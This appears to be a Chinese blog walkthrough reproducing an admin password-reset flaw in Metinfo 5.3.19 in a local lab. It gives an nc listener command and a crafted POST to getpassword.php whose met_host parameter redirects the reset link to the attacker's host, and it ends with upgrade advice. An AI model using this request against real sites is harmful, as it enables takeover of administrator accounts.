Metinfo 5.3.19管理员密码重置漏洞
操作系统:Windows 10专业版 kali linux
网站环境:UPUPW 5.3
使用工具:burpsuite 1.7 beta
#密码重置过程中验证不严
#漏洞涉及到的几个文件分别是:
admin/admin/getpassword.php
include/common.inc.php
include/jmail.php
include/export.func.php
安装(请忽略我用QQ浏览器)
upupw默认数据账户密码:root--root
漏洞复现
登陆localhost/metinfo/admin点击忘记密码
用burp抓包
在kali虚拟机上监听80端口
nc -lvvp 80
kali机器上IP为192.168.43.15
在burp repeater中构造http请求发送
POST /metinfo/admin/admin/getpassword.php?met_host=192.168.43.15
这时候在我们kali监听的80端口监听到了密码重置的链接
打开链接进入设置密码界面
我这里好几次没有监听到不知到是怎末回事重启了kali就可以了(计算机玄学吧有时候得信)
漏洞建议:
升级CMS版本
二次开发中优化登陆代码避免逻辑错误
原文:https://www.cnblogs.com/xiaoyunxiaogang/p/10927652.html